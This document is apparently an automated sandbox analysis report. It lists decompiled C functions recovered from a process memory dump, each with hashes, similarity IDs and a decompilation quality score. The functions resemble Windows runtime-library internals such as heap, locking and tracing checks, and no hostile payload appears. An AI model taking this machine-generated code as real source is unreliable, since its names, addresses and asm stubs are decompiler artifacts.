                                                    						E04C188F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                                    					}
                                                    					L5:
                                                    					return E04B9D130(_t68, _t82, _t84);
                                                    				}
                                                    				_t88 = _t82 -  *0x4c386c0; // 0xc907b0
                                                    				if(_t88 == 0) {
                                                    					goto L4;
                                                    				}
                                                    				_t89 = _t82 -  *0x4c386b8; // 0x0
                                                    				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                    					goto L4;
                                                    				} else {
                                                    					E04B62280(_t82 + 0xe0, _t82 + 0xe0);
                                                    					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                    					__eflags =  *((char*)(_t82 + 0xe5));
                                                    					if(__eflags != 0) {
                                                    						E04C188F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                                    						goto L12;
                                                    					} else {
                                                    						__eflags =  *((char*)(_t82 + 0xe4));
                                                    						if( *((char*)(_t82 + 0xe4)) == 0) {
                                                    							 *((char*)(_t82 + 0xe4)) = 1;
                                                    							_push(_t82);
                                                    							_push( *((intOrPtr*)(_t82 + 0x24)));
                                                    							E04B8AFD0();
                                                    						}
                                                    						while(1) {
                                                    							_t60 = _t82 + 8;
                                                    							 *(_t85 - 0x2c) = _t60;
                                                    							_t68 =  *_t60;
                                                    							_t80 = _t60[1];
                                                    							 *(_t85 - 0x28) = _t68;
                                                    							 *(_t85 - 0x24) = _t80;
                                                    							while(1) {
                                                    								L10:
                                                    								__eflags = _t80;
                                                    								if(_t80 == 0) {
                                                    									break;
                                                    								}
                                                    								_t84 = _t68;
                                                    								 *(_t85 - 0x30) = _t80;
                                                    								 *(_t85 - 0x24) = _t80 - 1;
                                                    								asm("lock cmpxchg8b [edi]");
                                                    								_t68 = _t84;
                                                    								 *(_t85 - 0x28) = _t68;
                                                    								 *(_t85 - 0x24) = _t80;
                                                    								__eflags = _t68 - _t84;
                                                    								_t82 =  *((intOrPtr*)(_t85 + 8));
                                                    								if(_t68 != _t84) {
                                                    									continue;
                                                    								}
                                                    								__eflags = _t80 -  *(_t85 - 0x30);
                                                    								if(_t80 !=  *(_t85 - 0x30)) {
                                                    									continue;
                                                    								}
                                                    								__eflags = _t80;
                                                    								if(_t80 == 0) {
                                                    									break;
                                                    								}
                                                    								_t63 = 0;
                                                    								 *(_t85 - 0x34) = 0;
                                                    								_t84 = 0;
                                                    								__eflags = 0;
                                                    								while(1) {
                                                    									 *(_t85 - 0x3c) = _t84;
                                                    									__eflags = _t84 - 3;
                                                    									if(_t84 >= 3) {
                                                    										break;
                                                    									}
                                                    									__eflags = _t63;
                                                    									if(_t63 != 0) {
                                                    										L40:
                                                    										_t84 =  *_t63;
                                                    										__eflags = _t84;
                                                    										if(_t84 != 0) {
                                                    											_t84 =  *(_t84 + 4);
                                                    											__eflags = _t84;
                                                    											if(_t84 != 0) {
                                                    												 *0x4c3b1e0(_t63, _t82);
                                                    												 *_t84();
                                                    											}
                                                    										}
                                                    										do {
                                                    											_t60 = _t82 + 8;
                                                    											 *(_t85 - 0x2c) = _t60;
                                                    											_t68 =  *_t60;
                                                    											_t80 = _t60[1];
                                                    											 *(_t85 - 0x28) = _t68;
                                                    											 *(_t85 - 0x24) = _t80;
                                                    											goto L10;
                                                    										} while (_t63 == 0);
                                                    										goto L40;
                                                    									}
                                                    									_t69 = 0;
                                                    									__eflags = 0;
                                                    									while(1) {
                                                    										 *(_t85 - 0x38) = _t69;
                                                    										__eflags = _t69 -  *0x4c384c0;
                                                    										if(_t69 >=  *0x4c384c0) {
                                                    											break;
                                                    										}
                                                    										__eflags = _t63;
                                                    										if(_t63 != 0) {
                                                    											break;
                                                    										}
                                                    										_t66 = E04C19063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                                    										__eflags = _t66;
                                                    										if(_t66 == 0) {
                                                    											_t63 = 0;
                                                    											__eflags = 0;
                                                    										} else {
                                                    											_t63 = _t66 + 0xfffffff4;
                                                    										}
                                                    										 *(_t85 - 0x34) = _t63;
                                                    										_t69 = _t69 + 1;
                                                    									}
                                                    									_t84 = _t84 + 1;
                                                    								}
                                                    								__eflags = _t63;
                                                    							}
                                                    							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                                    							 *((char*)(_t82 + 0xe5)) = 1;
                                                    							 *((char*)(_t85 - 0x1d)) = 1;
                                                    							L12:
                                                    							 *(_t85 - 4) = 0xfffffffe;
                                                    							E04B4922A(_t82);
                                                    							_t53 = E04B67D50();
                                                    							__eflags = _t53;
                                                    							if(_t53 != 0) {
                                                    								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                    							} else {
                                                    								_t56 = 0x7ffe0386;
                                                    							}
                                                    							__eflags =  *_t56;
                                                    							if( *_t56 != 0) {
                                                    								_t56 = E04C18B58(_t82);
                                                    							}
                                                    							__eflags =  *((char*)(_t85 - 0x1d));
                                                    							if( *((char*)(_t85 - 0x1d)) != 0) {
                                                    								__eflags = _t82 -  *0x4c386c0; // 0xc907b0
                                                    								if(__eflags != 0) {
                                                    									__eflags = _t82 -  *0x4c386b8; // 0x0
                                                    									if(__eflags == 0) {
                                                    										_t79 = 0x4c386bc;
                                                    										_t72 = 0x4c386b8;
                                                    										goto L18;
                                                    									}
                                                    									__eflags = _t56 | 0xffffffff;
                                                    									asm("lock xadd [edi], eax");
                                                    									if(__eflags == 0) {
                                                    										E04B49240(_t68, _t82, _t82, _t84, __eflags);
                                                    									}
                                                    								} else {
                                                    									_t79 = 0x4c386c4;
                                                    									_t72 = 0x4c386c0;
                                                    									L18:
                                                    									E04B79B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                                    								}
                                                    							}
                                                    							goto L5;
                                                    						}
                                                    					}
                                                    				}
                                                    			}



















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • Opcode ID: bcde96dc3c9fc6973947e8385ed599be24859c6f2970f045fa4fbc759d9268b9
                                                    • Instruction ID: 0c05284b6e3e423d47dc52d4a59fffd159aba9a13d9122faf3fe3733fc022361
                                                    • Opcode Fuzzy Hash: bcde96dc3c9fc6973947e8385ed599be24859c6f2970f045fa4fbc759d9268b9
                                                    • Instruction Fuzzy Hash: 6F31C3B5A05244EFEB25EF78C488BAEBBF1FB89354F1481D9D40467250C334B990EB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 53%
                                                    			E04B60050(void* __ecx) {
                                                    				signed int _v8;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				intOrPtr* _t30;
                                                    				intOrPtr* _t31;
                                                    				signed int _t34;
                                                    				void* _t40;
                                                    				void* _t41;
                                                    				signed int _t44;
                                                    				intOrPtr _t47;
                                                    				signed int _t58;
                                                    				void* _t59;
                                                    				void* _t61;
                                                    				void* _t62;
                                                    				signed int _t64;
                                                    
                                                    				_push(__ecx);
                                                    				_v8 =  *0x4c3d360 ^ _t64;
                                                    				_t61 = __ecx;
                                                    				_t2 = _t61 + 0x20; // 0x20
                                                    				E04B79ED0(_t2, 1, 0);
                                                    				_t52 =  *(_t61 + 0x8c);
                                                    				_t4 = _t61 + 0x8c; // 0x8c
                                                    				_t40 = _t4;
                                                    				do {
                                                    					_t44 = _t52;
                                                    					_t58 = _t52 & 0x00000001;
                                                    					_t24 = _t44;
                                                    					asm("lock cmpxchg [ebx], edx");
                                                    					_t52 = _t44;
                                                    				} while (_t52 != _t44);
                                                    				if(_t58 == 0) {
                                                    					L7:
                                                    					_pop(_t59);
                                                    					_pop(_t62);
                                                    					_pop(_t41);
                                                    					return E04B8B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                                    				}
                                                    				asm("lock xadd [esi], eax");
                                                    				_t47 =  *[fs:0x18];
                                                    				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                                    				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                                    				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                    				if(_t30 != 0) {
                                                    					if( *_t30 == 0) {
                                                    						goto L4;
                                                    					}
                                                    					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                    					L5:
                                                    					if( *_t31 != 0) {
                                                    						_t18 = _t61 + 0x78; // 0x78
                                                    						E04C18A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                                    					}
                                                    					_t52 =  *(_t61 + 0x5c);
                                                    					_t11 = _t61 + 0x78; // 0x78
                                                    					_t34 = E04B79702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                                    					_t24 = _t34 | 0xffffffff;
                                                    					asm("lock xadd [esi], eax");
                                                    					if((_t34 | 0xffffffff) == 0) {
                                                    						 *0x4c3b1e0(_t61);
                                                    						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                                    					}
                                                    					goto L7;
                                                    				}
                                                    				L4:
                                                    				_t31 = 0x7ffe0386;
                                                    				goto L5;
                                                    			}

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dc573cec93da1230710282405338fd213ead9dcc02cc18a0e119364c04e73ce7
                                                    • Instruction ID: 61b0ed9f26755c68006d726b012c5ddb9d304cb18865ccc1742c71ea01223341
                                                    • Opcode Fuzzy Hash: dc573cec93da1230710282405338fd213ead9dcc02cc18a0e119364c04e73ce7
                                                    • Instruction Fuzzy Hash: 96317A31601A048FD725DF29C840B96B7E5FF88718F1445ADE49B87A90EB79BC01DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 77%
                                                    			E04BC6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                                    				signed short* _v8;
                                                    				signed char _v12;
                                                    				void* _t22;
                                                    				signed char* _t23;
                                                    				intOrPtr _t24;
                                                    				signed short* _t44;
                                                    				void* _t47;
                                                    				signed char* _t56;
                                                    				signed char* _t58;
                                                    
                                                    				_t48 = __ecx;
                                                    				_push(__ecx);
                                                    				_push(__ecx);
                                                    				_t44 = __ecx;
                                                    				_v12 = __edx;
                                                    				_v8 = __ecx;
                                                    				_t22 = E04B67D50();
                                                    				_t58 = 0x7ffe0384;
                                                    				if(_t22 == 0) {
                                                    					_t23 = 0x7ffe0384;
                                                    				} else {
                                                    					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                    				}
                                                    				if( *_t23 != 0) {
                                                    					_t24 =  *0x4c37b9c; // 0x0
                                                    					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                                    					_t23 = L04B64620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                                    					_t56 = _t23;
                                                    					if(_t56 != 0) {
                                                    						_t56[0x24] = _a4;
                                                    						_t56[0x28] = _a8;
                                                    						_t56[6] = 0x1420;
                                                    						_t56[0x20] = _v12;
                                                    						_t14 =  &(_t56[0x2c]); // 0x2c
                                                    						E04B8F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                                    						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                                    						if(E04B67D50() != 0) {
                                                    							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                    						}
                                                    						_push(_t56);
                                                    						_push(_t47 - 0x20);
                                                    						_push(0x402);
                                                    						_push( *_t58 & 0x000000ff);
                                                    						E04B89AE0();
                                                    						_t23 = L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                                    					}
                                                    				}
                                                    				return _t23;
                                                    			}

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1786590103c2ad1692e7811dc2d659ca9bf7d75398a641093c5d73c5c15b41c5
                                                    • Instruction ID: 8479651a5fe9701931e745b69e65a0e10c8f6240c7cf65f5eb1d988ea494aa85
                                                    • Opcode Fuzzy Hash: 1786590103c2ad1692e7811dc2d659ca9bf7d75398a641093c5d73c5c15b41c5
                                                    • Instruction Fuzzy Hash: 7C21A1B1600644AFD715DF68D880F6AB7B8FF48748F1440A9F905D7791DA38ED10CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E04B890AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                                    				intOrPtr* _v0;
                                                    				void* _v8;
                                                    				signed int _v12;
                                                    				intOrPtr _v16;
                                                    				char _v36;
                                                    				void* _t38;
                                                    				intOrPtr _t41;
                                                    				void* _t44;
                                                    				signed int _t45;
                                                    				intOrPtr* _t49;
                                                    				signed int _t57;
                                                    				signed int _t58;
                                                    				intOrPtr* _t59;
                                                    				void* _t62;
                                                    				void* _t63;
                                                    				void* _t65;
                                                    				void* _t66;
                                                    				signed int _t69;
                                                    				intOrPtr* _t70;
                                                    				void* _t71;
                                                    				intOrPtr* _t72;
                                                    				intOrPtr* _t73;
                                                    				char _t74;
                                                    
                                                    				_t65 = __edx;
                                                    				_t57 = _a4;
                                                    				_t32 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t3 = _t32 + 0x14c; // 0x14c
                                                    				_t70 = _t3;
                                                    				_v16 = __ecx;
                                                    				_t72 =  *_t70;
                                                    				while(_t72 != _t70) {
                                                    					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                                    						L24:
                                                    						_t72 =  *_t72;
                                                    						continue;
                                                    					}
                                                    					_t30 = _t72 + 0x10; // 0x10
                                                    					if(E04B9D4F0(_t30, _t65, _t57) == _t57) {
                                                    						return 0xb7;
                                                    					}
                                                    					_t65 = _v8;
                                                    					goto L24;
                                                    				}
                                                    				_t61 = _t57;
                                                    				_push( &_v12);
                                                    				_t66 = 0x10;
                                                    				if(E04B7E5E0(_t57, _t66) < 0) {
                                                    					return 0x216;
                                                    				}
                                                    				_t73 = L04B64620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                                    				if(_t73 == 0) {
                                                    					_t38 = 0xe;
                                                    					return _t38;
                                                    				}
                                                    				_t9 = _t73 + 0x10; // 0x10
                                                    				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                                    				E04B8F3E0(_t9, _v8, _t57);
                                                    				_t41 =  *_t70;
                                                    				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                                    					_t62 = 3;
                                                    					asm("int 0x29");
                                                    					_push(_t62);
                                                    					_push(_t57);
                                                    					_push(_t73);
                                                    					_push(_t70);
                                                    					_t71 = _t62;
                                                    					_t74 = 0;
                                                    					_v36 = 0;
                                                    					_t63 = E04B7A2F0(_t62, _t71, 1, 6,  &_v36);
                                                    					if(_t63 == 0) {
                                                    						L20:
                                                    						_t44 = 0x57;
                                                    						return _t44;
                                                    					}
                                                    					_t45 = _v12;
                                                    					_t58 = 0x1c;
                                                    					if(_t45 < _t58) {
                                                    						goto L20;
                                                    					}
                                                    					_t69 = _t45 / _t58;
                                                    					if(_t69 == 0) {
                                                    						L19:
                                                    						return 0xe8;
                                                    					}
                                                    					_t59 = _v0;
                                                    					do {
                                                    						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                                    							goto L18;
                                                    						}
                                                    						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                                    						 *_t59 = _t49;
                                                    						if( *_t49 != 0x53445352) {
                                                    							goto L18;
                                                    						}
                                                    						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                                    						return 0;
                                                    						L18:
                                                    						_t63 = _t63 + 0x1c;
                                                    						_t74 = _t74 + 1;
                                                    					} while (_t74 < _t69);
                                                    					goto L19;
                                                    				}
                                                    				 *_t73 = _t41;
                                                    				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                                    				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                                    				 *_t70 = _t73;
                                                    				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                                    				return 0;
                                                    			}

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                    • Instruction ID: 525ef08431b64efa671ad24975ab50ba5c3df5f0009b6ffbfc46be8ad156479a
                                                    • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                    • Instruction Fuzzy Hash: CF214FB1A00204EFDB20EF59C984A6AF7F8EB44754F1488AEE955A7250D334FD50DF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 59%
                                                    			E04B73B7A(void* __ecx) {
                                                    				signed int _v8;
                                                    				char _v12;
                                                    				intOrPtr _v20;
                                                    				intOrPtr _t17;
                                                    				intOrPtr _t26;
                                                    				void* _t35;
                                                    				void* _t38;
                                                    				void* _t41;
                                                    				intOrPtr _t44;
                                                    
                                                    				_t17 =  *0x4c384c4; // 0x0
                                                    				_v12 = 1;
                                                    				_v8 =  *0x4c384c0 * 0x4c;
                                                    				_t41 = __ecx;
                                                    				_t35 = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x4c384c0 * 0x4c);
                                                    				if(_t35 == 0) {
                                                    					_t44 = 0xc0000017;
                                                    				} else {
                                                    					_push( &_v8);
                                                    					_push(_v8);
                                                    					_push(_t35);
                                                    					_push(4);
                                                    					_push( &_v12);
                                                    					_push(0x6b);
                                                    					_t44 = E04B8AA90();
                                                    					_v20 = _t44;
                                                    					if(_t44 >= 0) {
                                                    						E04B8FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x4c384c0 * 0xc);
                                                    						_t38 = _t35;
                                                    						if(_t35 < _v8 + _t35) {
                                                    							do {
                                                    								asm("movsd");
                                                    								asm("movsd");
                                                    								asm("movsd");
                                                    								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                                    							} while (_t38 < _v8 + _t35);
                                                    							_t44 = _v20;
                                                    						}
                                                    					}
                                                    					_t26 =  *0x4c384c4; // 0x0
                                                    					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                                    				}
                                                    				return _t44;
                                                    			}













                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 833b8bd5a5b3ec296b3819da204396e83780bb0d8a494a6d4b7e08e2eaef6147
                                                    • Instruction ID: 76602d54f530bd2225dd23b27d12b9b4fd2329a673fe74a9aea166c456063ceb
                                                    • Opcode Fuzzy Hash: 833b8bd5a5b3ec296b3819da204396e83780bb0d8a494a6d4b7e08e2eaef6147
                                                    • Instruction Fuzzy Hash: 6B2192B2600108AFD700EF58DD91B6ABBBDFB44708F1500A8F909AB651D775FD11DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 80%
                                                    			E04BC6CF0(void* __edx, intOrPtr _a4, short _a8) {
                                                    				char _v8;
                                                    				char _v12;
                                                    				char _v16;
                                                    				char _v20;
                                                    				char _v28;
                                                    				char _v36;
                                                    				char _v52;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				signed char* _t21;
                                                    				void* _t24;
                                                    				void* _t36;
                                                    				void* _t38;
                                                    				void* _t46;
                                                    
                                                    				_push(_t36);
                                                    				_t46 = __edx;
                                                    				_v12 = 0;
                                                    				_v8 = 0;
                                                    				_v20 = 0;
                                                    				_v16 = 0;
                                                    				if(E04B67D50() == 0) {
                                                    					_t21 = 0x7ffe0384;
                                                    				} else {
                                                    					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                                    				}
                                                    				if( *_t21 != 0) {
                                                    					_t21 =  *[fs:0x30];
                                                    					if((_t21[0x240] & 0x00000004) != 0) {
                                                    						if(E04B67D50() == 0) {
                                                    							_t21 = 0x7ffe0385;
                                                    						} else {
                                                    							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                                    						}
                                                    						if(( *_t21 & 0x00000020) != 0) {
                                                    							_t56 = _t46;
                                                    							if(_t46 == 0) {
                                                    								_t46 = 0x4b25c80;
                                                    							}
                                                    							_push(_t46);
                                                    							_push( &_v12);
                                                    							_t24 = E04B7F6E0(_t36, 0, _t46, _t56);
                                                    							_push(_a4);
                                                    							_t38 = _t24;
                                                    							_push( &_v28);
                                                    							_t21 = E04B7F6E0(_t38, 0, _t46, _t56);
                                                    							if(_t38 != 0) {
                                                    								if(_t21 != 0) {
                                                    									E04BC7016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                                    									L04B62400( &_v52);
                                                    								}
                                                    								_t21 = L04B62400( &_v28);
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t21;
                                                    			}




















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 978ae4617458b773f5a40a54a794d83396c3d71877793d3119771f0e55df9702
                                                    • Instruction ID: cbd204101549dc6ca231693dc3ceea8f858364f3290c9b6428f285a5f86db54f
                                                    • Opcode Fuzzy Hash: 978ae4617458b773f5a40a54a794d83396c3d71877793d3119771f0e55df9702
                                                    • Instruction Fuzzy Hash: 8521D372500645ABE311EF28C984F67B7EDEF81744F0409DAF98087250EB34E908D6A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 67%
                                                    			E04C1070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                    				char _v8;
                                                    				intOrPtr _v11;
                                                    				signed int _v12;
                                                    				intOrPtr _v15;
                                                    				signed int _v16;
                                                    				intOrPtr _v28;
                                                    				void* __ebx;
                                                    				char* _t32;
                                                    				signed int* _t38;
                                                    				signed int _t60;
                                                    
                                                    				_t38 = __ecx;
                                                    				_v16 = __edx;
                                                    				_t60 = E04C107DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                                    				if(_t60 != 0) {
                                                    					_t7 = _t38 + 0x38; // 0x29cd5903
                                                    					_push( *_t7);
                                                    					_t9 = _t38 + 0x34; // 0x6adeeb00
                                                    					_push( *_t9);
                                                    					_v12 = _a8 << 0xc;
                                                    					_t11 = _t38 + 4; // 0x5de58b5b
                                                    					_push(0x4000);
                                                    					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                                    					E04C0AFDE( &_v8,  &_v12);
                                                    					E04C11293(_t38, _v28, _t60);
                                                    					if(E04B67D50() == 0) {
                                                    						_t32 = 0x7ffe0380;
                                                    					} else {
                                                    						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                    					}
                                                    					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                    						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                                    						E04C014FB(_t38,  *_t21, _v11, _v15, 0xd);
                                                    					}
                                                    				}
                                                    				return  ~_t60;
                                                    			}














                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                    • Instruction ID: 634c80999e55491cbbfec376d8dd3c39e591e48ddcbb4382705fdf8d15156b7e
                                                    • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                    • Instruction Fuzzy Hash: A92134362042049FD705DF18C880B6ABBE6EFC5354F088569F9958B791DB30E949DB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 96%
                                                    			E04B6AE73(intOrPtr __ecx, void* __edx) {
                                                    				intOrPtr _v8;
                                                    				void* _t19;
                                                    				char* _t22;
                                                    				signed char* _t24;
                                                    				intOrPtr _t25;
                                                    				intOrPtr _t27;
                                                    				void* _t31;
                                                    				intOrPtr _t36;
                                                    				char* _t38;
                                                    				signed char* _t42;
                                                    
                                                    				_push(__ecx);
                                                    				_t31 = __edx;
                                                    				_v8 = __ecx;
                                                    				_t19 = E04B67D50();
                                                    				_t38 = 0x7ffe0384;
                                                    				if(_t19 != 0) {
                                                    					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                    				} else {
                                                    					_t22 = 0x7ffe0384;
                                                    				}
                                                    				_t42 = 0x7ffe0385;
                                                    				if( *_t22 != 0) {
                                                    					if(E04B67D50() == 0) {
                                                    						_t24 = 0x7ffe0385;
                                                    					} else {
                                                    						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                    					}
                                                    					if(( *_t24 & 0x00000010) != 0) {
                                                    						goto L17;
                                                    					} else {
                                                    						goto L3;
                                                    					}
                                                    				} else {
                                                    					L3:
                                                    					_t27 = E04B67D50();
                                                    					if(_t27 != 0) {
                                                    						_t27 =  *[fs:0x30];
                                                    						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                                    					}
                                                    					if( *_t38 != 0) {
                                                    						_t27 =  *[fs:0x30];
                                                    						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                                    							goto L5;
                                                    						}
                                                    						_t27 = E04B67D50();
                                                    						if(_t27 != 0) {
                                                    							_t27 =  *[fs:0x30];
                                                    							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                                    						}
                                                    						if(( *_t42 & 0x00000020) != 0) {
                                                    							L17:
                                                    							_t25 = _v8;
                                                    							_t36 = 0;
                                                    							if(_t25 != 0) {
                                                    								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                                    							}
                                                    							_t27 = E04BC7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                                    						}
                                                    						goto L5;
                                                    					} else {
                                                    						L5:
                                                    						return _t27;
                                                    					}
                                                    				}
                                                    			}














                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                    • Instruction ID: 72c5a6e73f8ab1e1d8b5dcd658dc1eca6c30e04ba42f8f51241baeb1fd302fac
                                                    • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                    • Instruction Fuzzy Hash: ED2104716016808FEB199B69C948B7577E8EF09348F1904E1DD468B392EBB8FC40DA90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
